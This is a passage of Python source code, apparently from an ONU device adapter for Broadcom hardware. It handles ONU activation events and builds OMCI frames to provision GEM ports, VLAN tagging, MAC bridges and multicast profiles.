handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_gemport(data)
def update_gemport(self, device, data):
raise NotImplementedError()
def remove_gemport(self, device, data):
log.info('remove-gemport', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.remove_gemport(data)
def create_multicast_gemport(self, device, data):
log.info('create-multicast-gemport', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_multicast_gemport(data)
def update_multicast_gemport(self, device, data):
raise NotImplementedError()
def remove_multicast_gemport(self, device, data):
raise NotImplementedError()
def create_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def update_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def remove_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def suppress_alarm(self, filter):
raise NotImplementedError()
def unsuppress_alarm(self, filter):
raise NotImplementedError()
class BroadcomOnuHandler(object):
def __init__(self, adapter, device_id):
self.adapter = adapter
self.adapter_agent = adapter.adapter_agent
self.device_id = device_id
self.log = structlog.get_logger(device_id=device_id)
self.incoming_messages = DeferredQueue()
self.event_messages = DeferredQueue()
self.proxy_address = None
self.tx_id = 0
# Need to query ONU for number of supported uni ports
# For now, temporarily set number of ports to 1 - port #2
self.uni_ports = (2,)
# Handle received ONU event messages
reactor.callLater(0, self.handle_onu_events)
def receive_message(self, msg):
self.incoming_messages.put(msg)
@inlineCallbacks
def handle_onu_events(self):
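        # Drain one event from the OLT-proxied event queue and update this
        # ONU's connect/oper status accordingly. The events handled below are
        # activation-completed, deactivation-completed, deactivate-onu and
        # ranging-completed; the handler re-schedules itself at the end so the
        # queue is serviced continuously.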
event_msg = yield self.event_messages.get()
if event_msg['event'] == 'activation-completed':
if event_msg['event_data']['activation_successful'] == True:
for uni in self.uni_ports:
port_no = self.proxy_address.channel_id + uni
yield self.message_exchange(
self.proxy_address.onu_id,
self.proxy_address.onu_session_id,
port_no)
device = self.adapter_agent.get_device(self.device_id)
device.connect_status = ConnectStatus.REACHABLE
device.oper_status = OperStatus.ACTIVE
self.adapter_agent.update_device(device)
else:
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.FAILED
self.adapter_agent.update_device(device)
elif event_msg['event'] == 'deactivation-completed':
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
elif event_msg['event'] == 'deactivate-onu':
device = self.adapter_agent.get_device(self.device_id)
device.connect_status = ConnectStatus.UNREACHABLE
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
self.disable_ports(device)
elif event_msg['event'] == 'ranging-completed':
if event_msg['event_data']['ranging_successful'] == True:
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.ACTIVATING
self.adapter_agent.update_device(device)
else:
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.FAILED
self.adapter_agent.update_device(device)
# Handle next event
reactor.callLater(0, self.handle_onu_events)
def activate(self, device):
self.log.info('activating')
# first we verify that we got parent reference and proxy info
assert device.parent_id
assert device.proxy_address.device_id
#assert device.proxy_address.channel_id # c-vid
# register for proxied messages right away
self.proxy_address = device.proxy_address
self.adapter_agent.register_for_proxied_messages(device.proxy_address)
# populate device info
device.root = True
device.vendor = 'Broadcom'
device.model = 'n/a'
device.hardware_version = 'to be filled'
device.firmware_version = 'to be filled'
device.images.image.extend([
Image(version="to be filled")
])
device.connect_status = ConnectStatus.REACHABLE
self.adapter_agent.update_device(device)
self.adapter_agent.add_port(device.id, Port(
port_no=100,
label='PON port',
type=Port.PON_ONU,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE,
peers=[
Port.PeerPort(
device_id=device.parent_id,
port_no=device.parent_port_no
)
]
))
parent_device = self.adapter_agent.get_device(device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
device = self.adapter_agent.get_device(device.id)
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
def reconcile(self, device):
self.log.info('reconciling-broadcom-onu-device-starts')
# first we verify that we got parent reference and proxy info
assert device.parent_id
assert device.proxy_address.device_id
# register for proxied messages right away
self.proxy_address = device.proxy_address
self.adapter_agent.register_for_proxied_messages(device.proxy_address)
# TODO: Query ONU current status after reconcile and update.
# To be addressed in future commits.
self.log.info('reconciling-broadcom-onu-device-ends')
def update_logical_port(self, logical_device_id, port_id, state):
self.log.info('updating-logical-port', logical_port_id=port_id,
logical_device_id=logical_device_id, state=state)
logical_port = self.adapter_agent.get_logical_port(logical_device_id,
port_id)
logical_port.ofp_port.state = state
self.adapter_agent.update_logical_port(logical_device_id,
logical_port)
def delete(self, device):
self.log.info('delete-onu')
# The device is already deleted in delete_v_ont_ani(). No more
# handling needed here
@inlineCallbacks
def update_flow_table(self, device, flows):
#
# We need to proxy through the OLT to get to the ONU
# Configuration from here should be using OMCI
#
#self.log.info('bulk-flow-update', device_id=device.id, flows=flows)
def is_downstream(port):
return port == 100 # Need a better way
def is_upstream(port):
return not is_downstream(port)
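        # NOTE: port 100 matches the port_no of the PON port created in
        # activate(), so flows arriving on it are treated as downstream and
        # everything else (the UNI ports) as upstream.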
for flow in flows:
_type = None
_port = None
_vlan_vid = None
_udp_dst = None
_udp_src = None
_ipv4_dst = None
_ipv4_src = None
_metadata = None
_output = None
_push_tpid = None
_field = None
_set_vlan_vid = None
self.log.info('bulk-flow-update', device_id=device.id, flow=flow)
try:
_in_port = fd.get_in_port(flow)
assert _in_port is not None
if is_downstream(_in_port):
self.log.info('downstream-flow')
elif is_upstream(_in_port):
self.log.info('upstream-flow')
else:
raise Exception('port should be 1 or 2 by our convention')
_out_port = fd.get_out_port(flow) # may be None
self.log.info('out-port', out_port=_out_port)
for field in fd.get_ofb_fields(flow):
if field.type == fd.ETH_TYPE:
_type = field.eth_type
self.log.info('field-type-eth-type',
eth_type=_type)
elif field.type == fd.IP_PROTO:
_proto = field.ip_proto
self.log.info('field-type-ip-proto',
ip_proto=_proto)
elif field.type == fd.IN_PORT:
_port = field.port
self.log.info('field-type-in-port',
in_port=_port)
elif field.type == fd.VLAN_VID:
_vlan_vid = field.vlan_vid & 0xfff
self.log.info('field-type-vlan-vid',
vlan=_vlan_vid)
elif field.type == fd.VLAN_PCP:
_vlan_pcp = field.vlan_pcp
self.log.info('field-type-vlan-pcp',
pcp=_vlan_pcp)
elif field.type == fd.UDP_DST:
_udp_dst = field.udp_dst
self.log.info('field-type-udp-dst',
udp_dst=_udp_dst)
elif field.type == fd.UDP_SRC:
_udp_src = field.udp_src
self.log.info('field-type-udp-src',
udp_src=_udp_src)
elif field.type == fd.IPV4_DST:
_ipv4_dst = field.ipv4_dst
self.log.info('field-type-ipv4-dst',
ipv4_dst=_ipv4_dst)
elif field.type == fd.IPV4_SRC:
_ipv4_src = field.ipv4_src
                        self.log.info('field-type-ipv4-src',
                                      ipv4_src=_ipv4_src)
elif field.type == fd.METADATA:
_metadata = field.table_metadata
self.log.info('field-type-metadata',
metadata=_metadata)
else:
raise NotImplementedError('field.type={}'.format(
field.type))
for action in fd.get_actions(flow):
if action.type == fd.OUTPUT:
_output = action.output.port
self.log.info('action-type-output',
output=_output, in_port=_in_port)
elif action.type == fd.POP_VLAN:
self.log.info('action-type-pop-vlan',
in_port=_in_port)
elif action.type == fd.PUSH_VLAN:
_push_tpid = action.push.ethertype
self.log.info('action-type-push-vlan',
push_tpid=_push_tpid, in_port=_in_port)
if action.push.ethertype != 0x8100:
self.log.error('unhandled-tpid',
ethertype=action.push.ethertype)
elif action.type == fd.SET_FIELD:
_field = action.set_field.field.ofb_field
assert (action.set_field.field.oxm_class ==
OFPXMC_OPENFLOW_BASIC)
self.log.info('action-type-set-field',
field=_field, in_port=_in_port)
if _field.type == fd.VLAN_VID:
_set_vlan_vid = _field.vlan_vid & 0xfff
                            self.log.info('set-field-type-vlan-vid',
                                          vlan_vid=_set_vlan_vid)
else:
self.log.error('unsupported-action-set-field-type',
field_type=_field.type)
else:
self.log.error('unsupported-action-type',
action_type=action.type, in_port=_in_port)
#
# All flows created from ONU adapter should be OMCI based
#
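                # For an upstream flow that matches VID 0 (priority-tagged
                # traffic) and sets a new VLAN ID, the sequence below
                # re-creates the VLAN tagging filter on the MAC bridge port
                # (entity 0x2102) with the new c-vid and updates the extended
                # VLAN tagging rules on the UNI (entity 0x202) for untagged
                # and priority-tagged frames.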
                if _vlan_vid == 0 and _set_vlan_vid is not None and _set_vlan_vid != 0:
# allow priority tagged packets
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
self.send_delete_vlan_tagging_filter_data(0x2102)
yield self.wait_for_response()
#self.send_set_vlan_tagging_filter_data(0x2102, _set_vlan_vid)
self.send_create_vlan_tagging_filter_data(0x2102, _set_vlan_vid)
yield self.wait_for_response()
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(0x202, 0x1000, _set_vlan_vid)
yield self.wait_for_response()
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x202, 8, 0, 0,
1, 8, _set_vlan_vid)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
'''
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x205, 8, 0, 0,
1, 8, _set_vlan_vid)
yield self.wait_for_response()
'''
except Exception as e:
self.log.exception('failed-to-install-flow', e=e, flow=flow)
def get_tx_id(self):
self.tx_id += 1
return self.tx_id
def send_omci_message(self, frame):
_frame = hexify(str(frame))
        self.log.info('send-omci-message', omci_msg=_frame)
device = self.adapter_agent.get_device(self.device_id)
try:
self.adapter_agent.send_proxied_message(device.proxy_address, _frame)
except Exception as e:
self.log.info('send-omci-message-exception', exc=str(e))
def send_get_circuit_pack(self, entity_id=0):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciGet.message_id,
omci_message=OmciGet(
entity_class=CircuitPack.class_id,
entity_id=entity_id,
attributes_mask=CircuitPack.mask_for('vendor_id')
)
)
self.send_omci_message(frame)
def send_mib_reset(self, entity_id=0):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciMibReset.message_id,
omci_message=OmciMibReset(
entity_class=OntData.class_id,
entity_id=entity_id
)
)
self.send_omci_message(frame)
def send_create_gal_ethernet_profile(self,
entity_id,
max_gem_payload_size):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=GalEthernetProfile.class_id,
entity_id=entity_id,
data=dict(
max_gem_payload_size=max_gem_payload_size
)
)
)
self.send_omci_message(frame)
def send_set_admin_state(self,
entity_id,
admin_state):
data = dict(
administrative_state=admin_state
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=OntG.class_id,
entity_id=entity_id,
attributes_mask=OntG.mask_for(*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_tcont(self,
entity_id,
alloc_id):
data = dict(
alloc_id=alloc_id
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=Tcont.class_id,
entity_id=entity_id,
attributes_mask=Tcont.mask_for(*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_8021p_mapper_service_profile(self,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=Ieee8021pMapperServiceProfile.class_id,
entity_id=entity_id,
data=dict(
tp_pointer=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_0=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_1=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_2=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_3=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_4=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_5=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_6=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_7=OmciNullPointer
)
)
)
self.send_omci_message(frame)
def send_create_mac_bridge_service_profile(self,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=MacBridgeServiceProfile.class_id,
entity_id=entity_id,
data=dict(
spanning_tree_ind=False,
learning_ind=True,
priority=0x8000,
max_age=20 * 256,
hello_time=2 * 256,
forward_delay=15 * 256,
unknown_mac_address_discard=True
)
)
)
self.send_omci_message(frame)
def send_create_gem_port_network_ctp(self,
entity_id,
port_id,
tcont_id,
direction,
tm):
_directions = {"upstream": 1, "downstream": 2, "bi-directional": 3}
        if direction in _directions:
_direction = _directions[direction]
else:
self.log.error('invalid-gem-port-direction', direction=direction)
raise ValueError('Invalid GEM port direction: {_dir}'.format(_dir=direction))
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=GemPortNetworkCtp.class_id,
entity_id=entity_id,
data=dict(
port_id=port_id,
tcont_pointer=tcont_id,
direction=_direction,
traffic_management_pointer_upstream=tm
)
)
)
self.send_omci_message(frame)
def send_create_multicast_gem_interworking_tp(self,
entity_id,
gem_port_net_ctp_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=MulticastGemInterworkingTp.class_id,
entity_id=entity_id,
data=dict(
gem_port_network_ctp_pointer=gem_port_net_ctp_id,
interworking_option=0,
service_profile_pointer=0x1
)
)
)
self.send_omci_message(frame)
def send_create_gem_inteworking_tp(self,
entity_id,
gem_port_net_ctp_id,
service_profile_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=GemInterworkingTp.class_id,
entity_id=entity_id,
data=dict(
gem_port_network_ctp_pointer=gem_port_net_ctp_id,
interworking_option=5,
service_profile_pointer=service_profile_id,
interworking_tp_pointer=0x0,
gal_profile_pointer=0x1
)
)
)
self.send_omci_message(frame)
def send_delete_omci_mesage(self,
class_id,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciDelete.message_id,
omci_message=OmciDelete(
entity_class=class_id,
entity_id=entity_id
)
)
self.send_omci_message(frame)
def send_set_8021p_mapper_service_profile(self,
entity_id,
interwork_tp_id):
data = dict(
interwork_tp_pointer_for_p_bit_priority_0=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_1=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_2=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_3=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_4=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_5=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_6=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_7=interwork_tp_id
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=Ieee8021pMapperServiceProfile.class_id,
entity_id=entity_id,
attributes_mask=Ieee8021pMapperServiceProfile.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_mac_bridge_port_configuration_data(self,
entity_id,
bridge_id,
port_id,
tp_type,
tp_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=MacBridgePortConfigurationData.class_id,
entity_id=entity_id,
data=dict(
bridge_id_pointer=bridge_id,
port_num=port_id,
tp_type=tp_type,
tp_pointer=tp_id
)
)
)
self.send_omci_message(frame)
def send_create_vlan_tagging_filter_data(self,
entity_id,
vlan_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=VlanTaggingFilterData.class_id,
entity_id=entity_id,
data=dict(
vlan_filter_0=vlan_id,
forward_operation=0x10,
number_of_entries=1
)
)
)
self.send_omci_message(frame)
def send_set_vlan_tagging_filter_data(self,
entity_id,
vlan_id):
data = dict(
vlan_filter_0=vlan_id,
forward_operation=0x10,
number_of_entries=1
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=VlanTaggingFilterData.class_id,
entity_id=entity_id,
attributes_mask=VlanTaggingFilterData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_delete_vlan_tagging_filter_data(self,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciDelete.message_id,
omci_message=OmciDelete(
entity_class=VlanTaggingFilterData.class_id,
entity_id=entity_id
)
)
self.send_omci_message(frame)
def send_create_extended_vlan_tagging_operation_configuration_data(self,
entity_id,
assoc_type,
assoc_me):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
data=dict(
association_type=assoc_type,
associated_me_pointer=assoc_me
)
)
)
self.send_omci_message(frame)
def send_set_extended_vlan_tagging_operation_tpid_configuration_data(self,
entity_id,
input_tpid,
output_tpid):
data = dict(
input_tpid=input_tpid,
output_tpid=output_tpid,
downstream_mode=0, # inverse of upstream
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
attributes_mask=
ExtendedVlanTaggingOperationConfigurationData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(self,
entity_id,
filter_inner_vid,
treatment_inner_vid):
data = dict(
received_frame_vlan_tagging_operation_table=
VlanTaggingOperation(
filter_outer_priority=15,
filter_outer_vid=4096,
filter_outer_tpid_de=0,
filter_inner_priority=15,
filter_inner_vid=filter_inner_vid,
filter_inner_tpid_de=0,
filter_ether_type=0,
treatment_tags_to_remove=0,
treatment_outer_priority=15,
treatment_outer_vid=0,
treatment_outer_tpid_de=0,
treatment_inner_priority=0,
treatment_inner_vid=treatment_inner_vid,
treatment_inner_tpid_de=4
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
attributes_mask=
ExtendedVlanTaggingOperationConfigurationData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(self,
entity_id,
filter_inner_priority,
filter_inner_vid,
filter_inner_tpid_de,
treatment_tags_to_remove,
treatment_inner_priority,
treatment_inner_vid):
data = dict(
received_frame_vlan_tagging_operation_table=
VlanTaggingOperation(
filter_outer_priority=15,
filter_outer_vid=4096,
filter_outer_tpid_de=0,
filter_inner_priority=filter_inner_priority,
filter_inner_vid=filter_inner_vid,
filter_inner_tpid_de=filter_inner_tpid_de,
filter_ether_type=0,
treatment_tags_to_remove=treatment_tags_to_remove,
treatment_outer_priority=15,
treatment_outer_vid=0,
treatment_outer_tpid_de=0,
treatment_inner_priority=treatment_inner_priority,
treatment_inner_vid=treatment_inner_vid,
treatment_inner_tpid_de=4
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
attributes_mask=
ExtendedVlanTaggingOperationConfigurationData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_multicast_operations_profile(self,
entity_id,
igmp_ver):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=
MulticastOperationsProfile.class_id,
entity_id=entity_id,
data=dict(
igmp_version=igmp_ver,
igmp_function=0,
immediate_leave=0
)
)
)
self.send_omci_message(frame)
def send_set_multicast_operations_profile_acl_row0(self,
entity_id,
acl_table,
row_key,
gem_port,
vlan,
src_ip,
dst_ip_start,
dst_ip_end):
row0 = AccessControlRow0(
set_ctrl=1,
row_part_id=0,
test=0,
row_key=row_key,
gem_port_id=gem_port,
vlan_id=vlan,
src_ip=src_ip,
dst_ip_start=dst_ip_start,
dst_ip_end=dst_ip_end,
ipm_group_bw=0
)
if acl_table == 'dynamic':
data = dict(
dynamic_access_control_list_table=row0
)
else:
data = dict(
static_access_control_list_table=row0
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastOperationsProfile.class_id,
entity_id=entity_id,
attributes_mask=MulticastOperationsProfile.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_operations_profile_ds_igmp_mcast_tci(self,
entity_id,
ctrl_type,
tci):
data = dict(
ds_igmp_mcast_tci=
DownstreamIgmpMulticastTci(
ctrl_type=ctrl_type,
tci=tci
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastOperationsProfile.class_id,
entity_id=entity_id,
attributes_mask=MulticastOperationsProfile.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_multicast_subscriber_config_info(self,
entity_id,
me_type,
mcast_oper_profile):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=
MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
data=dict(
me_type=me_type,
mcast_operations_profile_pointer=mcast_oper_profile
)
)
)
self.send_omci_message(frame)
def send_set_multicast_subscriber_config_info(self,
entity_id,
max_groups=0,
max_mcast_bw=0,
bw_enforcement=0):
data = dict(
max_simultaneous_groups=max_groups,
max_multicast_bandwidth=max_mcast_bw,
bandwidth_enforcement=bw_enforcement
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_service_package(self,
entity_id,
row_key,
vid_uni,
max_groups,
max_mcast_bw,
mcast_oper_profile):
data = dict(
multicast_service_package_table=
MulticastServicePackage(
set_ctrl=1,
row_key=row_key,
vid_uni=vid_uni,
max_simultaneous_groups=max_groups,
max_multicast_bw=max_mcast_bw,
mcast_operations_profile_pointer=mcast_oper_profile
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_allowed_preview_groups_row0(self,
entity_id,
row_key,
src_ip,
vlan_id_ani,
vlan_id_uni):
data = dict(
allowed_preview_groups_table=
AllowedPreviewGroupsRow0(
set_ctrl=1,
row_part_id=0,
row_key=row_key,
src_ip=src_ip,
vlan_id_ani=vlan_id_ani,
vlan_id_uni=vlan_id_uni
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_allowed_preview_groups_row1(self,
entity_id,
row_key,
dst_ip,
duration,
time_left):
data = dict(
allowed_preview_groups_table=
AllowedPreviewGroupsRow1(
set_ctrl=1,
row_part_id=1,
row_key=row_key,
dst_ip=dst_ip,
duration=duration,
time_left=time_left
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_reboot(self):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciReboot.message_id,
omci_message=OmciReboot(
entity_class=OntG.class_id,
entity_id=0
)
)
self.send_omci_message(frame)
@inlineCallbacks
def wait_for_response(self):
self.log.info('wait-for-response')
try:
response = yield self.incoming_messages.get()
self.log.info('got-response')
resp = OmciFrame(response)
resp.show()
returnValue(resp)
        except Exception as e:
            self.log.info('wait-for-response-exception', exc=str(e))
            returnValue(None)
@inlineCallbacks
def message_exchange(self, onu, gem, cvid):
self.log.info('message_exchange', onu=onu, gem=gem, cvid=cvid)
# reset incoming message queue
while self.incoming_messages.pending:
_ = yield self.incoming_messages.get()
cvid = BRDCM_DEFAULT_VLAN
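        # The exchange below walks the ONU through its initial OMCI MIB
        # provisioning: MIB reset, GAL Ethernet profile, extended VLAN
        # tagging and MAC bridge MEs for the UNI, an 802.1p mapper with its
        # bridge port and VLAN tagging filter, and finally the multicast
        # GEM/operations-profile MEs. Each request is followed by
        # wait_for_response() so the messages stay strictly sequential.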
# construct message
# MIB Reset - OntData - 0
self.send_mib_reset()
yield self.wait_for_response()
# Create AR - GalEthernetProfile - 1
self.send_create_gal_ethernet_profile(1, 48)
yield self.wait_for_response()
# Port 2
# Extended VLAN Tagging Operation config
# Create AR - ExtendedVlanTaggingOperationConfigData - 514 - 2 - 0x102(Uni-Port-Num)
# TODO: add entry here for additional UNI interfaces
self.send_create_extended_vlan_tagging_operation_configuration_data(0x202, 2, 0x102)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData - 514 - 8100 - 8100
self.send_set_extended_vlan_tagging_operation_tpid_configuration_data(0x202, 0x8100, 0x8100)
yield self.wait_for_response()
# MAC Bridge Service config
# Create AR - MacBridgeServiceProfile - 513
self.send_create_mac_bridge_service_profile(0x201)
yield self.wait_for_response()
        # Create AR - MacBridgePortConfigData - Entity_id -
        #                                       bridge ID -
        #                                       port num -
        #                                       tp_type -
        #                                       IEEE Mapper pointer
self.send_create_mac_bridge_port_configuration_data(0x201, 0x201, 2, 1, 0x102)
yield self.wait_for_response()
# Mapper Service config
# Create AR - 802.1pMapperServiceProfile - 32769
self.send_create_8021p_mapper_service_profile(0x8001)
yield self.wait_for_response()
# MAC Bridge Port config
# Create AR - MacBridgePortConfigData - 8450 - 513 - 3 - 3 - 32769
self.send_create_mac_bridge_port_configuration_data(0x2102, 0x201, 3, 3, 0x8001)
yield self.wait_for_response()
# VLAN Tagging Filter config
# Create AR - VlanTaggingFilterData - 8450 - c-vid
self.send_create_vlan_tagging_filter_data(0x2102, cvid)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
#self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x202, 8, 0, 0, 1, 8, cvid)
#yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to untagged pkts - c-vid
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(0x202, 0x1000, cvid)
yield self.wait_for_response()
# Multicast related MEs
# Set AR - MulticastOperationsProfile - Dynamic Access Control List table
# Create AR - MacBridgePortConfigData - 9000 - 513 - 6 - 6 - 6
self.send_create_mac_bridge_port_configuration_data(0x2328, 0x201, 6, 6, 6)
yield self.wait_for_response()
# Multicast Operation Profile config
# Create AR - MulticastOperationsProfile
self.send_create_multicast_operations_profile(0x201, 3)
yield self.wait_for_response()
# Multicast Subscriber config
# Create AR - MulticastSubscriberConfigInfo
self.send_create_multicast_subscriber_config_info(0x201, 0, 0x201)
yield self.wait_for_response()
# Create AR - GemPortNetworkCtp - 260 - 4000 - 0 Multicast
self.send_create_gem_port_network_ctp(0x104, 0x0FA0, 0, "downstream", 0)
yield self.wait_for_response()
# Multicast GEM Interworking config Multicast
# Create AR - MulticastGemInterworkingTp - 6 - 260
self.send_create_multicast_gem_interworking_tp(0x6, 0x104)
yield self.wait_for_response()
self.send_set_multicast_operations_profile_acl_row0(0x201,
'dynamic',
0,
0x0fa0,
0x0fa0,
'0.0.0.0',
'172.16.58.3',
'172.16.58.3')
yield self.wait_for_response()
# Multicast Operation Profile config
# Set AR - MulticastOperationsProfile - Downstream IGMP Multicast TCI
self.send_set_multicast_operations_profile_ds_igmp_mcast_tci(0x201, 4, cvid)
yield self.wait_for_response()
'''
# Port 5
# Extended VLAN Tagging Operation config
# Create AR - ExtendedVlanTaggingOperationConfigData - 514 - 2 - 0x102
# TODO: add entry here for additional UNI interfaces
self.send_create_extended_vlan_tagging_operation_configuration_data(0x205, 2, 0x105)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData - 514 - 8100 - 8100
self.send_set_extended_vlan_tagging_operation_tpid_configuration_data(0x205, 0x8100, 0x8100)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
#self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x205, 8, 0, 0, 1, 8, cvid)
#yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to untagged pkts - c-vid
